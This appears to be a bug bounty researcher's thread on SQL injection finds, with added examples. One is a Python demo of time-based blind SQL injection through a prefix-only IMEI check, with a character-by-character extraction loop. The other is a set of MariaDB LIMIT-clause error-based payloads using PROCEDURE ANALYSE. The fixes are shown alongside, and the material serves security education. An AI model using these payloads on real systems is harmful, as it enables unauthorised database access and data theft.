As of today I passed the half-million milestone on @SynackRedTeam, with 200k of it in the last 90 days. So far this month is about to catch the previous one too; we will see what happens in the next 10 days :). #bugbounty #bugbountytips
Almost all my bugs this month were SQLis again. I'll try to give another example from the unique ones.
One of the targets had a SQLi on some weird endpoint. It was expecting XML data, but it looked like it was looking for "xml" as the parameter.
I started to send some XML data via it. The application was giving an error for each tag I used, but for one of them it gave a "string couldn't be parsed" error.
After that I started to fuzz for attributes and found out IMEI was the one it looked for; however, any value I tried gave an "Invalid IMEI value" error again.
I looked around on the web, located some data sent to the target app, and used the IMEI value from there. The application stopped giving the error, but it looked like it was vulnerable to SQLi on the same parameter.
It looked like the developer was parsing the first 15 characters and checking whether that was a valid IMEI, then processing the entire payload.
However, this was fully blind SQLi, so I used time-based payloads and was able to extract data. I hope this will be helpful for others too, and shows: do not give up on the target.
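The bug described in the thread, reconstructed as an added example (this is not the author's code or the target's code, and the backend logic is assumed): the validator runs the Luhn check on only the first 15 characters, so a value that starts with a genuine IMEI and continues with SQL passes validation and is concatenated into the query. Because the thread says the injection was fully blind, the extraction below asks yes/no questions through a time delay. The database is an in-memory SQLite stand-in with a Python `sleep()` registered in place of MySQL's `SLEEP()`, the tables, the IMEI `490154203237518` and the secret are constructed sample data, and `lookup_safe` shows the hardened form (whole-value validation plus a bound parameter).

```python
import sqlite3
import time

# Constructed sample: a syntactically valid 15-digit IMEI (Luhn check digit 8).
SAMPLE_IMEI = "490154203237518"
DELAY = 0.1  # seconds the injected sleep stalls the query when a condition holds


def luhn_ok(digits: str) -> bool:
    """The IMEI check digit is a Luhn checksum over all 15 digits."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # double every second digit counting from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def validate_imei_prefix(value: str) -> bool:
    """Assumed vulnerable check: only the first 15 characters are validated."""
    head = value[:15]
    return len(head) == 15 and head.isdigit() and luhn_ok(head)


def validate_imei_strict(value: str) -> bool:
    """Hardened check: the whole value must be exactly 15 digits."""
    return len(value) == 15 and value.isdigit() and luhn_ok(value)


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the backend; sleep() emulates MySQL's SLEEP()."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, time.sleep)
    conn.execute("CREATE TABLE devices(imei TEXT, owner TEXT)")
    conn.execute("INSERT INTO devices VALUES (?, ?)", (SAMPLE_IMEI, "alice"))
    conn.execute("CREATE TABLE users(name TEXT, secret TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cr3t')")
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, imei: str) -> list:
    """Prefix-only validation, then the whole value is concatenated into SQL."""
    if not validate_imei_prefix(imei):
        raise ValueError("Invalid IMEI value")
    sql = f"SELECT owner FROM devices WHERE imei = '{imei}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, imei: str) -> list:
    """Strict validation plus a bound parameter: the payload never reaches SQL."""
    if not validate_imei_strict(imei):
        raise ValueError("Invalid IMEI value")
    rows = conn.execute("SELECT owner FROM devices WHERE imei = ?", (imei,))
    return [row[0] for row in rows]


def time_oracle(conn: sqlite3.Connection, cond: str) -> bool:
    """Ask the blind injection one yes/no question; 'yes' shows up as a delay."""
    payload = (f"{SAMPLE_IMEI}' AND (SELECT CASE WHEN {cond} "
               f"THEN sleep({DELAY}) ELSE 0 END) AND '1'='1")
    start = time.perf_counter()
    lookup_vulnerable(conn, payload)  # the response body is never inspected
    return time.perf_counter() - start >= DELAY / 2


def blind_extract(oracle, expr: str, max_len: int = 64) -> str:
    """Recover the string value of SQL expression `expr` one character at a
    time, binary-searching printable ASCII (about 7 oracle calls per char)."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length({expr}) >= {pos}"):
            break  # end of string reached
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo() -> str:
    """Extract the admin secret through the time-based oracle."""
    conn = build_db()
    secret_expr = "(SELECT secret FROM users WHERE name = 'admin')"
    return blind_extract(lambda c: time_oracle(conn, c), secret_expr)


if __name__ == "__main__":
    print(demo())
```

On a real MySQL/MariaDB target the same `blind_extract` loop works unchanged; only `time_oracle` differs (`SLEEP()` instead of the registered `sleep()`, `ORD()` instead of `unicode()`, and a threshold tuned to network jitter). Note that a time-based condition placed in a `WHERE` clause only fires if the engine actually evaluates it for at least one row, which is why the payload keeps the valid IMEI in front so the row matches.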

Thread author: Mustafa Can İPEKÇİ

More from @mcipekci

Feb 26
On a recent engagement on a program on @SynackRedTeam, I found out that the target had error-based SQL injection in a LIMIT clause; it appeared that the DBMS was MariaDB 10.4.13, so that limited the options that could be used in the injection. #bugbountytips #bugbounty 1/5
The only way to exploit the vulnerability was using PROCEDURE ANALYSE at the injection point. However, we were not able to use subqueries inside ANALYSE because it's not allowed. So our options were limited to fetching things like database(), user() etc. 2/5
The payload for the injection was like this: 1+procedure+analyse(extractvalue(rand(),version()),1). However, this only allows us to retrieve the version of the DBMS, so I started to check which other functions were available to use within the permissions of the current user. 3/5
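The LIMIT-clause technique from the thread in context, as an added example that is not the author's payload or the target's query. The table `items` and its columns are assumed; the statements are written for MySQL 5.x / MariaDB, where `PROCEDURE ANALYSE()` still exists (MySQL 8.0 removed it).

```sql
-- Assumed vulnerable statement: the page size is concatenated, unquoted, after LIMIT.
SELECT id, name FROM items LIMIT 1;

-- Grammar after LIMIT only admits PROCEDURE, INTO OUTFILE/DUMPFILE, FOR UPDATE or
-- LOCK IN SHARE MODE, so UNION or an AND/OR tail cannot be appended here.
-- The arguments of PROCEDURE ANALYSE() are evaluated, and EXTRACTVALUE() with an
-- invalid XPath raises an error that echoes the XPath text back to the client.
-- The 0x7e ('~') prefix guarantees the XPath is invalid even for a plain value.
SELECT id, name FROM items
LIMIT 1 PROCEDURE ANALYSE(EXTRACTVALUE(RAND(), CONCAT(0x7e, VERSION())), 1);
-- raises: XPATH syntax error: '~<version string>'

-- Subqueries are rejected inside PROCEDURE ("Incorrect usage of PROCEDURE and
-- subquery"), so only scalar functions and system variables are reachable.
SELECT id, name FROM items
LIMIT 1 PROCEDURE ANALYSE(EXTRACTVALUE(RAND(), CONCAT(0x7e, USER(), 0x7e, DATABASE())), 1);

-- The echoed XPath is truncated to 32 characters; slice longer values with MID().
SELECT id, name FROM items
LIMIT 1 PROCEDURE ANALYSE(EXTRACTVALUE(RAND(), CONCAT(0x7e, MID(@@version_compile_os, 1, 31))), 1);

-- Fix: LIMIT accepts a bound parameter in a prepared statement, so the page size
-- never becomes part of the SQL text (and the application should cast it to an
-- integer before binding).
PREPARE stmt FROM 'SELECT id, name FROM items LIMIT ?';
SET @page_size = 1;
EXECUTE stmt USING @page_size;
DEALLOCATE PREPARE stmt;
```

Which functions and variables are readable in the third statement depends on the privileges of the account the application connects with, which is the enumeration the thread goes on to describe.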
